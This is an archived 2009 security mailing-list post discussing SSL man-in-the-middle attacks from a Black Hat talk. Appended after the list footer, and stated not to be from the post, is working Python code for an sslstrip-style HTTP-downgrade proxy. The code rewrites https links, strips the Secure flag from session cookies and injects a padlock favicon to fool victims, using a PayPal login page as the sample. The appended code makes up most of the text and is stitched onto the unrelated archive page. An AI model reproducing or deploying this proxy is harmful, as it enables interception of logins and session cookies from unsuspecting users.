Dailydave mailing list archives

Re: SSL MITM fun.


From: Dragos Ruiu <dr () kyx net>
Date: Thu, 19 Feb 2009 12:29:17 -0800


On 19-Feb-09, at 10:04 AM, Dan Moniz wrote:

On Thu, Feb 19, 2009 at 12:07 PM, Dave Aitel <dave () immunityinc com> wrote:

This is a good presentation.

https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

Essentially he details 3 attacks (from what I can tell):
1. Register a .cn address and use a unicode character for / and ? to
have HTTPS://www.paypal.com/?domain.cn?<some args> validate

Unless I'm missing something, this is essentially what Eric Johanson
said in 2005 about IDN:
http://www.shmoo.com/idn/homograph.txt

2. Force the user to stay on HTTP with a MITM proxy that modifies the
data as it goes through. Send HTTPS to the server, and HTTP to the
client. Use a lock icon as your favicon to fool the user into thinking they are
"secure" even though they see HTTP:// instead of HTTPS://

3. Sign the leaf cert with your leaf cert. This abuses an
implementation flaw in OpenSSL, etc.

If you can sit between endpoints, modify traffic, and you control one
of the eventual endpoints anyway, and only you're jumping through all
these hoops to maintain the illusion for the unsuspecting user, why
not just take control of DNS and *actually* MITM SSL?


/me points to Sotirov et al.'s upcoming presentation in March.

I know our editor will be putting up the edited talk descriptions shortly, but
an earlier version of the abstract was:

Description:

Extended Validation (EV) SSL certificates have been touted by Certificate
Authorities and browser vendors as a solution to the poor validation standards
for issuing traditional SSL certificates. It was previously thought that EV
certificates are not affected by attacks that allow malicious hackers to obtain
a non-EV SSL certificate, such as the MD5 collision attack or the widely
publicized failures of some CAs to validate domain ownership before issuing
certificates.

Unfortunately, it turns out that the security offered by EV certificates is not
any better than the security of even the cheapest $12 SSL certificate. In this
talk we will show how any attacker who can obtain a non-EV SSL certificate for
a website can perform completely transparent man-in-the-middle attacks on any
SSL connection to that site, even if the website is protected by an EV
certificate and the users are diligently inspecting all information contained
in the SSL certificates.

cheers,
--dr

--
World Security Pros. Cutting Edge Training, Tools, and Techniques
Vancouver, Canada  March 16-20 2009  http://cansecwest.com
London, U.K. May 27/28 2009 http://eusecwest.com
pgpkey http://dragos.com/ kyxpgp

_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
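Added example (not from the original post, from Dan's or Dave's messages, or from Marlinspike's sslstrip tool): the rewriting logic behind attack 2 above, an HTTP-downgrading MITM proxy. It speaks HTTPS to the server and plain HTTP to the victim, rewrites every https:// reference in the reply to http://, remembers each stripped URL so that the victim's later http:// request can be fetched over TLS upstream, rewrites Location headers, removes the Secure flag from cookies (otherwise the browser would refuse to return them over HTTP), and injects a padlock favicon. The sample headers and HTML are constructed for the demonstration; the `/lock.ico` path is an assumption, and the regex-based rewriting is a simplification of what a full proxy would have to do to HTML and JavaScript.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Absolute https:// references inside HTML attributes, headers or scripts.
HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")

# Path on the proxy that serves a padlock image; an assumption made for this
# example, not something the original post specifies.
LOCK_FAVICON_PATH = "/lock.ico"


class Downgrader:
    """Rewriting logic of an HTTP-downgrading MITM proxy.

    The proxy fetches pages from the real server over HTTPS and hands them
    to the victim over plain HTTP. Every https:// link it strips is
    remembered so that the victim's later http:// request for that URL can
    be fetched over HTTPS again, keeping the server side looking normal.
    """

    def __init__(self):
        # http:// URL given to the victim -> https:// URL the server expects
        self.upgrade_map = {}

    def downgrade_url(self, url):
        """Turn one https:// URL into http:// and record the mapping."""
        parts = urlsplit(url)
        if parts.scheme.lower() != "https":
            return url
        stripped = urlunsplit(("http",) + tuple(parts[1:]))
        self.upgrade_map[stripped] = url
        return stripped

    def downgrade_body(self, html):
        """Strip every https:// reference and inject the padlock favicon."""
        body = HTTPS_URL.sub(lambda m: self.downgrade_url(m.group(0)), html)
        favicon = '<link rel="shortcut icon" href="%s">' % LOCK_FAVICON_PATH
        # Insert the favicon right after <head>; the victim sees a padlock in
        # the tab even though the address bar says http://.
        return re.sub(r"<head(\s[^>]*)?>", lambda m: m.group(0) + favicon,
                      body, count=1, flags=re.IGNORECASE)

    def downgrade_headers(self, headers):
        """Rewrite response headers that would otherwise break the downgrade."""
        out = []
        for name, value in headers:
            lname = name.lower()
            if lname == "location":
                # A redirect to https:// would pull the victim back onto TLS.
                value = self.downgrade_url(value)
            elif lname == "set-cookie":
                # A browser never sends a Secure cookie over plain HTTP, so the
                # session would break unless the flag is removed.
                value = re.sub(r";\s*secure(?=;|$)", "", value,
                               flags=re.IGNORECASE)
            out.append((name, value))
        return out

    def upgrade_request(self, url):
        """Map a victim's plain-HTTP request back to the URL to fetch upstream."""
        return self.upgrade_map.get(url, url)


# Constructed sample response, standing in for a login page fetched over TLS.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Location", "https://www.paypal.com/account"),
    ("Set-Cookie", "sid=abc123; Path=/; Secure; HttpOnly"),
]
SAMPLE_BODY = (
    '<html><head><title>Log in</title></head><body>'
    '<a href="https://www.paypal.com/login">Log in</a>'
    '<form action="https://www.paypal.com/cgi-bin/webscr"></form>'
    '</body></html>'
)


def demo():
    """Run the sample response through the proxy; returns (headers, body, upstream)."""
    proxy = Downgrader()
    headers = proxy.downgrade_headers(SAMPLE_HEADERS)
    body = proxy.downgrade_body(SAMPLE_BODY)
    # The victim clicks the stripped link; the proxy knows to use TLS upstream.
    upstream = proxy.upgrade_request("http://www.paypal.com/login")
    return headers, body, upstream


if __name__ == "__main__":
    hdrs, body, upstream = demo()
    for h in hdrs:
        print("%s: %s" % h)
    print(body)
    print("victim asked for http://www.paypal.com/login -> proxy fetches", upstream)
```

Run it as a script to see the rewritten response. The countermeasure browsers later standardized, HTTP Strict Transport Security (RFC 6797), only helps once the browser has already seen the header from that host over a genuine TLS connection; a proxy sitting on the first visit can simply drop it, so the rewriting above is still the right model of what the attacker does.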

